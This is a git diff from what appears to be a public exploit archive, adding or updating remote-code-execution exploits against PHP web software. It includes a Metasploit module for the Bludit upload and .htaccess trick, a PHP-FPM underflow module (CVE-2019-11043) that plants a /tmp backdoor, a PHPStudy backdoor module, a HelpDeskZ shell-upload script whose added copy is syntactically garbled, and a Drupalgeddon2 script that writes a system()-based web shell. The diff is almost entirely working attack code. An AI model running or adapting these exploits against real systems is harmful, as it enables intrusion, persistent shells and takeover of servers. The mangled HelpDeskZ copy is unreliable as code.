+    end
+
+    content_attr = generator_tag.attributes['content']
+    unless content_attr
+      vprint_error("No content attribute found in metadata tag")
+      return CheckCode::Safe
+    end
+
+    if content_attr.value == 'Bludit'
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
+  def get_uuid(login_badge)
+    print_status('Retrieving UUID...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'admin', 'new-content', 'index.php'),
+      'cookie' => "BLUDIT-KEY=#{login_badge.bludit_key};"
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    html = res.get_html_document
+    uuid_element = html.at('input[@name="uuid"]')
+    unless uuid_element
+      fail_with(Failure::Unknown, 'No UUID found in admin/new-content/')
+    end
+
+    uuid_val = uuid_element.attributes['value']
+    unless uuid_val && uuid_val.respond_to?(:value)
+      fail_with(Failure::Unknown, 'No UUID value')
+    end
+
+    uuid_val.value
+  end
+
+  def upload_file(login_badge, uuid, content, fname)
+    print_status("Uploading #{fname}...")
+
+    data = Rex::MIME::Message.new
+    data.add_part(content, 'image/png', nil, "form-data; name=\"images[]\"; filename=\"#{fname}\"")
+    data.add_part(uuid, nil, nil, 'form-data; name="uuid"')
+    data.add_part(login_badge.csrf_token, nil, nil, 'form-data; name="tokenCSRF"')
+
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, 'admin', 'ajax', 'upload-images'),
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'cookie'  => "BLUDIT-KEY=#{login_badge.bludit_key};",
+      'headers' => {'X-Requested-With' => 'XMLHttpRequest'},
+      'data'    => data.to_s
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+  end
+
+  def upload_php_payload_and_exec(login_badge)
+    # From: /var/www/html/bludit/bl-content/uploads/pages/5821e70ef1a8309cb835ccc9cec0fb35/
+    # To: /var/www/html/bludit/bl-content/tmp
+    uuid = get_uuid(login_badge)
+    php_payload = get_php_payload
+    upload_file(login_badge, '../../tmp', php_payload.payload, php_payload.name)
+
+    # On the vuln app, this line occurs first:
+    # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
+    # Even though there is a file extension check, it won't really stop us
+    # from uploading the .htaccess file.
+    htaccess = <<~HTA
+    RewriteEngine off
+    AddType application/x-httpd-php .png
+    HTA
+    upload_file(login_badge, uuid, htaccess, ".htaccess")
+    register_file_for_cleanup('.htaccess')
+
+    print_status("Executing #{php_payload.name}...")
+    send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'bl-content', 'tmp', php_payload.name)
+    })
+  end
+
+  def get_php_payload
+    @php_payload ||= PhpPayload.new(get_write_exec_payload(unlink_self: true))
+  end
+
+  def get_login_badge(res)
+    cookies = res.get_cookies
+    bludit_key = cookies.scan(/BLUDIT\-KEY=(.+);/i).flatten.first || ''
+
+    html = res.get_html_document
+    csrf_element = html.at('input[@name="tokenCSRF"]')
+    unless csrf_element
+      fail_with(Failure::Unknown, 'No tokenCSRF found')
+    end
+
+    csrf_val = csrf_element.attributes['value']
+    unless csrf_val && csrf_val.respond_to?(:value)
+      fail_with(Failure::Unknown, 'No tokenCSRF value')
+    end
+
+    LoginBadge.new(datastore['BLUDITUSER'], datastore['BLUDITPASS'], csrf_val.value, bludit_key)
+  end
+
+  def do_login
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'admin', 'index.php')
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    login_badge = get_login_badge(res)
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'admin', 'index.php'),
+      'cookie'    => "BLUDIT-KEY=#{login_badge.bludit_key};",
+      'vars_post' =>
+        {
+          'tokenCSRF' => login_badge.csrf_token,
+          'username'  => login_badge.username,
+          'password'  => login_badge.password
+        }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out')
+    end
+
+    # A new csrf value is generated, need to update this for the upload
+    if res.headers['Location'].to_s.include?('/admin/dashboard')
+      store_valid_credential(user: login_badge.username, private: login_badge.password)
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, 'admin', 'dashboard', 'index.php'),
+        'cookie' => "BLUDIT-KEY=#{login_badge.bludit_key};",
+      })
+
+      unless res
+        fail_with(Failure::Unknown, 'Connection timed out')
+      end
+
+      new_csrf = res.body.scan(/var tokenCSRF = "(.+)";/).flatten.first
+      login_badge.csrf_token = new_csrf if new_csrf
+      return login_badge
+    end
+
+    fail_with(Failure::NoAccess, 'Authentication failed')
+  end
+
+  def exploit
+    login_badge = do_login
+    print_good("Logged in as: #{login_badge.username}")
+    upload_php_payload_and_exec(login_badge)
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/48182.rb b/exploits/php/remote/48182.rb
new file mode 100755
index 000000000..f0a44c2cd
--- /dev/null
+++ b/exploits/php/remote/48182.rb
@@ -0,0 +1,436 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'PHP-FPM Underflow RCE',
+        'Description'    => %q(
+          This module exploits an underflow vulnerability in versions 7.1.x
+          below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on
+          Nginx. Only servers with certains Nginx + PHP-FPM configurations are
+          exploitable. This is a port of the original neex's exploit code (see
+          refs.). First, it detects the correct parameters (Query String Length
+          and custom header length) needed to trigger code execution. This step
+          determines if the target is actually vulnerable (Check method). Then,
+          the exploit sets a series of PHP INI directives to create a file
+          locally on the target, which enables code execution through a query
+          string parameter. This is used to execute normal payload stagers.
+          Finally, this module does some cleanup by killing local PHP-FPM
+          workers (those are spawned automatically once killed) and removing
+          the created local file.
+        ),
+        'Author'         => [
+          'neex',          # (Emil Lerner) Discovery and original exploit code
+          'cdelafuente-r7' # This module
+        ],
+        'References'     =>
+          [
+            ['CVE', '2019-11043'],
+            ['EDB', '47553'],
+            ['URL', 'https://github.com/neex/phuip-fpizdam'],
+            ['URL', 'https://bugs.php.net/bug.php?id=78599'],
+            ['URL', 'https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html']
+          ],
+        'DisclosureDate' => "2019-10-22",
+        'License'        => MSF_LICENSE,
+        'Payload'        => {
+          'BadChars' => "&>\' "
+        },
+        'Targets'        => [
+          [
+            'PHP', {
+              'Platform' => 'php',
+              'Arch'     => ARCH_PHP,
+              'Payload'  => {
+                'PrependEncoder' => "php -r \"",
+                'AppendEncoder'  => "\""
+              }
+            }
+          ],
+          [
+            'Shell Command', {
+              'Platform' => 'unix',
+              'Arch'     => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes'         => {
+          'Stability'   => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to a PHP page', '/index.php'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('MinQSL', [true, 'Minimum query string length', 1500]),
+      OptInt.new('MaxQSL', [true, 'Maximum query string length', 1950]),
+      OptInt.new('QSLHint', [false, 'Query string length hint']),
+      OptInt.new('QSLDetectStep', [true, 'Query string length detect step', 5]),
+      OptInt.new('MaxQSLCandidates', [true, 'Max query string length candidates', 10]),
+      OptInt.new('MaxQSLDetectDelta', [true, 'Max query string length detection delta', 10]),
+      OptInt.new('MaxCustomHeaderLength', [true, 'Max custom header length', 256]),
+      OptInt.new('CustomHeaderLengthHint', [false, 'Custom header length hint']),
+      OptEnum.new('DetectMethod', [true, "Detection method", 'session.auto_start', self.class.detect_methods.keys]),
+      OptInt.new('OperationMaxRetries', [true, 'Maximum of operation retries', 20])
+    ])
+    @filename = rand_text_alpha(1)
+    @http_param = rand_text_alpha(1)
+  end
+
+  CHECK_COMMAND   = "which which"
+  SUCCESS_PATTERN = "/bin/which"
+
+  class DetectMethod
+    attr_reader :php_option_enable, :php_option_disable
+
+    def initialize(php_option_enable:, php_option_disable:, check_cb:)
+      @php_option_enable = php_option_enable
+      @php_option_disable = php_option_disable
+      @check_cb = check_cb
+    end
+
+    def php_option_enabled?(res)
+      !!@check_cb.call(res)
+    end
+  end
+
+  def self.detect_methods
+    {
+      'session.auto_start' => DetectMethod.new(
+        php_option_enable: 'session.auto_start=1',
+        php_option_disable: 'session.auto_start=0',
+        check_cb: ->(res) { res.get_cookies =~ /PHPSESSID=/ }
+      ),
+      'output_handler.md5' => DetectMethod.new(
+        php_option_enable:  'output_handler=md5',
+        php_option_disable: 'output_handler=NULL',
+        check_cb: ->(res) { res.body.length == 16 }
+      )
+    }
+  end
+
+  def send_crafted_request(path:, qsl: datastore['MinQSL'], customh_length: 1, cmd: '', allow_retry: true)
+    uri = URI.encode(normalize_uri(target_uri.path, path)).gsub(/([?&])/, {'?'=>'%3F', '&'=>'%26'})
+    qsl_delta = uri.length - path.length - URI.encode(target_uri.path).length
+    if qsl_delta.odd?
+      fail_with Failure::Unknown, "Got odd qslDelta, that means the URL encoding gone wrong: path=#{path}, qsl_delta=#{qsl_delta}"
+    end
+    prefix = cmd.empty? ? '' : "#{@http_param}=#{URI.encode(cmd)}%26"
+    qsl_prime = qsl - qsl_delta/2 - prefix.length
+    if qsl_prime < 0
+      fail_with Failure::Unknown, "QSL value too small to fit the command: QSL=#{qsl}, qsl_delta=#{qsl_delta}, prefix (size=#{prefix.size})=#{prefix}"
+    end
+    uri = "#{uri}?#{prefix}#{'Q'*qsl_prime}"
+    opts = {
+      'method'  => 'GET',
+      'uri'     => uri,
+      'headers' => {
+        'CustomH' => "x=#{Rex::Text.rand_text_alphanumeric(customh_length)}",
+        'Nuut'    => Rex::Text.rand_text_alphanumeric(11)
+      }
+    }
+    actual_timeout = datastore['HttpClientTimeout'] if datastore['HttpClientTimeout']&.> 0
+    actual_timeout ||= 20
+
+    connect(opts) if client.nil? || !client.conn?
+    # By default, try to reuse an existing connection (persist option).
+    res = client.send_recv(client.request_raw(opts), actual_timeout, true)
+    if res.nil? && allow_retry
+      # The server closed the connection, resend without 'persist', which forces
+      # reconnecting. This could happen if the connection is reused too much time.
+      # Nginx will automatically close a keepalive connection after 100 requests
+      # by default or whatever value is set by the 'keepalive_requests' option.
+      res = client.send_recv(client.request_raw(opts), actual_timeout)
+    end
+    res
+  end
+
+  def repeat_operation(op, opts={})
+    datastore['OperationMaxRetries'].times do |i|
+      vprint_status("#{op}: try ##{i+1}")
+      res = opts.empty? ? send(op) : send(op, opts)
+      return res if res
+    end
+    nil
+  end
+
+  def extend_qsl_list(qsl_candidates)
+    qsl_candidates.each_with_object([]) do |qsl, extended_qsl|
+      (0..datastore['MaxQSLDetectDelta']).step(datastore['QSLDetectStep']) do |delta|
+        extended_qsl << qsl - delta
+      end
+    end.sort.uniq
+  end
+
+  def sanity_check?
+    datastore['OperationMaxRetries'].times do
+      res = send_crafted_request(
+        path: "/PHP\nSOSAT",
+        qsl: datastore['MaxQSL'],
+        customh_length: datastore['MaxCustomHeaderLength']
+      )
+      unless res
+        vprint_error("Error during sanity check")
+        return false
+      end
+      if res.code != @base_status
+        vprint_error(
+          "Invalid status code: #{res.code} (must be #{@base_status}). "\
+          "Maybe \".php\" suffix is required?"
+        )
+        return false
+      end
+      detect_method = self.class.detect_methods[datastore['DetectMethod']]
+      if detect_method.php_option_enabled?(res)
+        vprint_error(
+          "Detection method '#{datastore['DetectMethod']}' won't work since "\
+          "the PHP option has already been set on the target. Try another one"
+        )
+        return false
+      end
+    end
+    return true
+  end
+
+  def set_php_setting(php_setting:, qsl:, customh_length:, cmd: '')
+    res = nil
+    path = "/PHP_VALUE\n#{php_setting}"
+    pos_offset = 34
+    if path.length > pos_offset
+      vprint_error(
+        "The path size (#{path.length} bytes) is larger than the allowed size "\
+        "(#{pos_offset} bytes). Choose a shorter php.ini value (current: '#{php_setting}')")
+      return nil
+    end
+    path += ';' * (pos_offset - path.length)
+    res = send_crafted_request(
+      path: path,
+      qsl: qsl,
+      customh_length: customh_length,
+      cmd: cmd
+    )
+    unless res
+      vprint_error("error while setting #{php_setting} for qsl=#{qsl}, customh_length=#{customh_length}")
+    end
+    return res
+  end
+
+  def send_params_detection(qsl_candidates:, customh_length:, detect_method:)
+    php_setting = detect_method.php_option_enable
+    vprint_status("Iterating until the PHP option is enabled (#{php_setting})...")
+    customh_lengths = customh_length ? [customh_length] : (1..datastore['MaxCustomHeaderLength']).to_a
+    qsl_candidates.product(customh_lengths) do |qsl, c_length|
+      res = set_php_setting(php_setting: php_setting, qsl: qsl, customh_length: c_length)
+      unless res
+        vprint_error("Error for qsl=#{qsl}, customh_length=#{c_length}")
+        return nil
+      end
+      if res.code != @base_status
+        vprint_status("Status code #{res.code} for qsl=#{qsl}, customh_length=#{c_length}")
+      end
+      if detect_method.php_option_enabled?(res)
+        php_setting = detect_method.php_option_disable
+        vprint_status("Attack params found, disabling PHP option (#{php_setting})...")
+        set_php_setting(php_setting: php_setting, qsl: qsl, customh_length: c_length)
+        return { qsl: qsl, customh_length: c_length }
+      end
+    end
+    return nil
+  end
+
+  def detect_params(qsl_candidates)
+    customh_length = nil
+    if datastore['CustomHeaderLengthHint']
+      vprint_status(
+        "Using custom header length hint for max length (customh_length="\
+        "#{datastore['CustomHeaderLengthHint']})"
+      )
+      customh_length = datastore['CustomHeaderLengthHint']
+    end
+    detect_method = self.class.detect_methods[datastore['DetectMethod']]
+    return repeat_operation(
+      :send_params_detection,
+      qsl_candidates: qsl_candidates,
+      customh_length: customh_length,
+      detect_method: detect_method
+    )
+  end
+
+  def send_attack_chain
+    [
+      "short_open_tag=1",
+      "html_errors=0",
+      "include_path=/tmp",
+      "auto_prepend_file=#{@filename}",
+      "log_errors=1",
+      "error_reporting=2",
+      "error_log=/tmp/#{@filename}",
+      "extension_dir=\"<?=`\"",
+      "extension=\"$_GET[#{@http_param}]`?>\""
+    ].each do |php_setting|
+      vprint_status("Sending php.ini setting: #{php_setting}")
+      res = set_php_setting(
+        php_setting: php_setting,
+        qsl: @params[:qsl],
+        customh_length: @params[:customh_length],
+        cmd: "/bin/sh -c '#{CHECK_COMMAND}'"
+      )
+      if res
+        return res if res.body.include?(SUCCESS_PATTERN)
+      else
+        print_error("Error when setting #{php_setting}")
+        return nil
+      end
+    end
+    return nil
+  end
+
+  def send_payload
+    disconnect(client) if client&.conn?
+    send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      cmd: payload.encoded,
+      allow_retry: false
+    )
+    Rex.sleep(1)
+    return session_created? ? true : nil
+  end
+
+  def send_backdoor_cleanup
+    cleanup_command = ";echo '<?php echo `$_GET[#{@http_param}]`;return;?>'>/tmp/#{@filename}"
+    res = send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      cmd: cleanup_command + ';' + CHECK_COMMAND
+    )
+    return res if res&.body.include?(SUCCESS_PATTERN)
+    return nil
+  end
+
+  def detect_qsl
+    qsl_candidates = []
+    (datastore['MinQSL']..datastore['MaxQSL']).step(datastore['QSLDetectStep']) do |qsl|
+      res = send_crafted_request(path: "/PHP\nabcdefghijklmopqrstuv.php", qsl: qsl)
+      unless res
+        vprint_error("Error when sending query with QSL=#{qsl}")
+        next
+      end
+      if res.code != @base_status
+        vprint_status("Status code #{res.code} for qsl=#{qsl}, adding as a candidate")
+        qsl_candidates << qsl
+      end
+    end
+    qsl_candidates
+  end
+
+  def check
+    print_status("Sending baseline query...")
+    res = send_crafted_request(path: "/path\ninfo.php")
+    return CheckCode::Unknown("Error when sending baseline query") unless res
+    @base_status = res.code
+    vprint_status("Base status code is #{@base_status}")
+
+    if datastore['QSLHint']
+      print_status("Skipping qsl detection, using hint (qsl=#{datastore['QSLHint']})")
+      qsl_candidates = [datastore['QSLHint']]
+    else
+      print_status("Detecting QSL...")
+      qsl_candidates = detect_qsl
+    end
+    if qsl_candidates.empty?
+      return CheckCode::Detected("No qsl candidates found, not vulnerable or something went wrong")
+    end
+    if qsl_candidates.size > datastore['MaxQSLCandidates']
+      return CheckCode::Detected("Too many qsl candidates found, looks like I got banned")
+    end
+
+    print_good("The target is probably vulnerable. Possible QSLs: #{qsl_candidates}")
+
+    qsl_candidates = extend_qsl_list(qsl_candidates)
+    vprint_status("Extended QSL list: #{qsl_candidates}")
+
+    print_status("Doing sanity check...")
+    return CheckCode::Detected('Sanity check failed') unless sanity_check?
+
+    print_status("Detecting attack parameters...")
+    @params = detect_params(qsl_candidates)
+    return CheckCode::Detected('Unable to detect parameters') unless @params
+
+    print_good("Parameters found: QSL=#{@params[:qsl]}, customh_length=#{@params[:customh_length]}")
+    print_good("Target is vulnerable!")
+    CheckCode::Vulnerable
+  ensure
+    disconnect(client) if client&.conn?
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+    end
+    if @params[:qsl].nil? || @params[:customh_length].nil?
+      fail_with Failure::NotVulnerable, 'Attack parameters not found'
+    end
+
+    print_status("Performing attack using php.ini settings...")
+    if repeat_operation(:send_attack_chain)
+      print_good("Success! Was able to execute a command by appending '#{CHECK_COMMAND}'")
+    else
+      fail_with Failure::Unknown, 'Failed to send the attack chain'
+    end
+
+    print_status("Trying to cleanup /tmp/#{@filename}...")
+    if repeat_operation(:send_backdoor_cleanup)
+      print_good('Cleanup done!')
+    end
+
+    print_status("Sending payload...")
+    repeat_operation(:send_payload)
+  end
+
+  def send_cleanup(cleanup_cmd:)
+    res = send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      cmd: cleanup_cmd
+    )
+    return res if res && res.code != @base_status
+    return nil
+  end
+
+  def cleanup
+    return unless successful
+    kill_workers = 'for p in `pidof php-fpm`; do kill -9 $p;done'
+    rm = "rm -f /tmp/#{@filename}"
+    cleanup_cmd = kill_workers + ';' + rm
+    disconnect(client) if client&.conn?
+    print_status("Remove /tmp/#{@filename} and kill workers...")
+    if repeat_operation(:send_cleanup, cleanup_cmd: cleanup_cmd)
+      print_good("Done!")
+    else
+      print_bad(
+        "Could not cleanup. Run these commands before terminating the session: "\
+        "#{kill_workers}; #{rm}"
+      )
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/remote/48192.rb b/exploits/php/remote/48192.rb
new file mode 100755
index 000000000..7c688696e
--- /dev/null
+++ b/exploits/php/remote/48192.rb
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "PHPStudy Backdoor Remote Code execution",
+      'Description'    => %q{
+        This module can detect and exploit the backdoor of PHPStudy.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Dimensional',  #POC
+          'Airevan'       #Metasploit Module
+        ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['PHPStudy 2016-2018', {}]
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 20 2019",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/'])
+      ])
+  end
+  def check
+    uri = target_uri.path
+    fingerprint = Rex::Text.rand_text_alpha(8)
+    res = send_request_cgi({
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(uri, 'index.php'),
+      'headers' =>  {
+        'Accept-Encoding' =>  'gzip,deflate',
+        'Accept-Charset'  =>  Rex::Text.encode_base64("echo '#{fingerprint}';")
+      }
+    })
+
+    if res && res.code == 200 && res.body.to_s.include?(fingerprint)
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+  def exploit
+    uri = target_uri.path
+    print_good("Sending shellcode")
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(uri, 'index.php'),
+      'headers' => {
+          'Accept-Encoding' => 'gzip,deflate',
+          'Accept-Charset'  => Rex::Text.encode_base64(payload.encoded)
+      }
+  })
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/40300.py b/exploits/php/webapps/40300.py
index 049cbdf1b..804a16aa6 100755
--- a/exploits/php/webapps/40300.py
+++ b/exploits/php/webapps/40300.py
@@ -1,3 +1,70 @@
+'''
+#
+# Updated Exploit Provided by Drew Griess
+#
+# Exploit Title HelpDeskZ = v1.0.2 - Unauthenticated Shell Upload
+# Google Dork intextHelp Desk Software by HelpDeskZ
+# Date 2016-08-26
+# Exploit Author Lars Morgenroth - @krankoPwnz
+# Vendor Homepage httpwww.helpdeskz.com
+# Software Link httpsgithub.comevolutionscriptHelpDeskZ-1.0archivemaster.zip
+# Version = v1.0.2
+# Tested on
+# CVE 
+
+HelpDeskZ = v1.0.2 suffers from an unauthenticated shell upload vulnerability.
+
+The software in the default configuration allows upload for .php-Files ( !! ). I think the developers thought it was no risk, because the filenames get obfuscated when they are uploaded. However, there is a weakness in the rename function of the uploaded file
+
+controllers httpsgithub.comevolutionscriptHelpDeskZ-1.0tree006662bb856e126a38f2bb76df44a2e4e3d37350controllerssubmit_ticket_controller.php - Line 141
+$filename = md5($_FILES['attachment']['name'].time())...$ext;
+
+So by guessing the time the file was uploaded, we can get RCE.
+
+Steps to reproduce
+
+httplocalhosthelpdeskzv=submit_ticket&action=displayForm
+
+Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket.
+
+Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded
+
+exploit.py httplocalhosthelpdeskz phpshell.php
+'''
+import hashlib
+import time
+import sys
+import requests
+import datetime
+
+print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
+
+if len(sys.argv)  3
+    print Usage {} [baseUrl] [nameOfUploadedFile].format(sys.argv[0])
+    sys.exit(1)
+
+helpdeskzBaseUrl = sys.argv[1]
+fileName = sys.argv[2]
+
+
+r = requests.get(helpdeskzBaseUrl)
+
+#Gets the current time of the server to prevent timezone errors - DoctorEww
+currentTime = int((datetime.datetime.strptime(r.headers['date'], %a, %d %b %Y %H%M%S %Z) - datetime.datetime(1970,1,1)).total_seconds())
+
+for x in range(0, 300)
+    plaintext = fileName + str(currentTime - x)
+    md5hash = hashlib.md5(plaintext).hexdigest()
+
+    url = helpdeskzBaseUrl+md5hash+'.php'
+    response = requests.head(url)
+    if response.status_code == 200
+        print found!
+        print url
+        sys.exit(0)
+
+print Sorry, I did not find anything
+
 '''
 # Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
 # Google Dork: intext:"Help Desk Software by HelpDeskZ"
@@ -27,7 +94,7 @@ Enter anything in the mandatory fields, attach your phpshell.php, solve the capt
 Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded:
 
 exploit.py http://localhost/helpdeskz/ phpshell.php 
-'''            
+            
 import hashlib
 import time
 import sys
@@ -55,4 +122,5 @@ for x in range(0, 300):
         print url
         sys.exit(0)
 
-print "Sorry, I did not find anything"
\ No newline at end of file
+print "Sorry, I did not find anything"
+'''
\ No newline at end of file
diff --git a/exploits/php/webapps/40968.php b/exploits/php/webapps/40968.sh
old mode 100644
new mode 100755
similarity index 100%
rename from exploits/php/webapps/40968.php
rename to exploits/php/webapps/40968.sh
diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb
index e476524c6..37801373d 100755
--- a/exploits/php/webapps/44449.rb
+++ b/exploits/php/webapps/44449.rb
@@ -1,6 +1,6 @@
 #!/usr/bin/env ruby
 #
-# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
+# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
 #
 # Authors:
 # - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
@@ -13,21 +13,20 @@ require 'json'
 require 'net/http'
 require 'openssl'
 require 'readline'
+require 'highline/import'
 
 
-# Settings - Proxy information (nil to disable)
-proxy_addr = nil
-proxy_port = 8080
-
-
-# Settings - General
+# Settings - Try to write a PHP to the web root?
+try_phpshell = true
+# Settings - General/Stealth
 $useragent = "drupalgeddon2"
-webshell = "s.php"
-writeshell = true
+webshell = "shell.php"
+# Settings - Proxy information (nil to disable)
+$proxy_addr = nil
+$proxy_port = 8080
 
 
-# Settings - Payload (we could just be happy without this, but we can do better!)
-#bashcmd = "<?php if( isset( $_REQUEST[c] ) ) { eval( $_GET[c]) ); } ?>'
+# Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!)
 bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
 bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
 
@@ -35,90 +34,199 @@ bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
 # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
 
-# Function http_post <url> [post]
-def http_post(url, payload="")
-  uri = URI(url)
-  request = Net::HTTP::Post.new(uri.request_uri)
-  request.initialize_http_header({"User-Agent" => $useragent})
-  request.body = payload
-  return $http.request(request)
+# Function http_request <url> [type] [data]
+def http_request(url, type="get", payload="", cookie="")
+  puts verbose("HTTP - URL : #{url}") if $verbose
+  puts verbose("HTTP - Type: #{type}") if $verbose
+  puts verbose("HTTP - Data: #{payload}") if not payload.empty? and $verbose
+
+  begin
+    uri = URI(url)
+    request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)
+    request.initialize_http_header({"User-Agent" => $useragent})
+    request.initialize_http_header("Cookie" => cookie) if not cookie.empty?
+    request.body = payload if not payload.empty?
+    return $http.request(request)
+  rescue SocketError
+    puts error("Network connectivity issue")
+  rescue Errno::ECONNREFUSED => e
+    puts error("The target is down ~ #{e.message}")
+    puts error("Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...") if $proxy_addr
+  rescue Timeout::Error => e
+    puts error("The target timed out ~ #{e.message}")
+  end
+
+  # If we got here, something went wrong.
+  exit
 end
 
 
-# Function gen_evil_url <cmd>
-def gen_evil_url(evil, feedback=true)
-  # PHP function to use (don't forget about disabled functions...)
-  phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
+# Function gen_evil_url <cmd> [method] [shell] [phpfunction]
+def gen_evil_url(evil, element="", shell=false, phpfunction="passthru")
+  puts info("Payload: #{evil}") if not shell
+  puts verbose("Element    : #{element}") if not shell and not element.empty? and $verbose
+  puts verbose("PHP fn     : #{phpfunction}") if not shell and $verbose
 
-  #puts "[*] PHP cmd: #{phpmethod}" if feedback
-  puts "[*] Payload: #{evil}" if feedback
+  # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render
+  # Check the version to match the payload
+  if $drupalverion.start_with?("8") and element == "mail"
+    # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200
+    url = $target + $clean_url + $form + "?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+    payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpfunction + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
 
-  ## Check the version to match the payload
-  # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
-  if $drupalverion.start_with?('8')
-    # Method #1 - Drupal 8, mail, #post_render - response is 200
-    url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
-    payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
+  elsif $drupalverion.start_with?("8") and element == "timezone"
+    # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru
+    url = $target + $clean_url + $form + "?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+    payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=" + phpfunction + "&timezone[a][#lazy_builder][][]=" + evil
 
-    # Method #2 - Drupal 8,  timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
-    #url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
-    #payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
-  elsif $drupalverion.start_with?('7')
-    # Method #3 - Drupal 7, name, #post_render - response is 200
-    url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
